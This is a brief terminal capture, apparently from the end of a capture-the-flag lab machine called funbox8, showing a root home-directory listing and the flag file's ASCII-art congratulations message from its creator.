drwx------ 4 root root 4096 May 22 2021 .
drwxr-xr-x 20 root root 4096 May 22 2021 ..
-rw------- 1 root root 238 May 22 2021 .bash_history
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 369 May 22 2021 root.flag
-rwxr-xr-x 1 root root 35 May 22 2021 run.sh
drwxr-xr-x 3 root root 4096 May 22 2021 snap
drwx------ 2 root root 4096 May 22 2021 .ssh
-rw------- 1 root root 15427 May 22 2021 .viminfo
root@funbox8:~# cat root.flag
|~~ | | | | |
|--| ||/~\ |~~\/~\\/o | | ||/~\ /~~|/~\ |~~\|/~\/~//~~||_//~/|/~\
| \_/|| ||__/\_//\o |__\_/|| |\__| ||__/| \/_\__|| \\/_|
created by @0815R2d2.
Congrats ! I look forward to see this on my twitter-account :-)
root@funbox8:~#
